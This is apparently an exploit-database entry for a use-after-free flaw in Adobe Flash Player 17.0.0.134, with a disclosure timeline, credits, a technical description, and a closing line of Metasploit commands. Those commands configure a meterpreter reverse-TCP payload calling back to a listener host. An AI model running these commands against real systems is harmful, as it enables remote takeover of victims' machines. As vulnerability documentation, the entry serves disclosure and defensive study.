Timeline :
Vulnerability discovered by bilou and reported to Chromium VRP
Patched by the vendor the 2015-04-14
Vulnerability discovered integrated into exploit kit the 2015-04-17
PoC provided by unknown and hdarwin the 2015-05-02
Metasploit PoC provided the 2015-05-08
PoC provided by :
bilou
Unknown
hdarwin
juan vazquez
Reference(s) :
Affected version(s) :
Adobe Flash Player 17.0.0.134 and earlier versions
Tested on :
Windows 7 SP1 and Internet Explorer 8 with Adobe Flash 17.0.0.134
Description :
This module exploits a use-after-free vulnerability in Adobe Flash Player. The vulnerability occurs when the ByteArray assigned to the current ApplicationDomain is freed from an ActionScript worker, when forcing a reallocation by copying more contents than the original capacity, but Flash forgets to update the domainMemory pointer, leading to a use-after-free situation when the main worker references the domainMemory again. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash 17.0.0.134.
Commands :
use exploit/windows/browser/adobe_flash_domain_memory_uaf set SRVHOST 192.168.6.138 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.6.138 run getuid
llowfullscreen=”allowfullscreen”>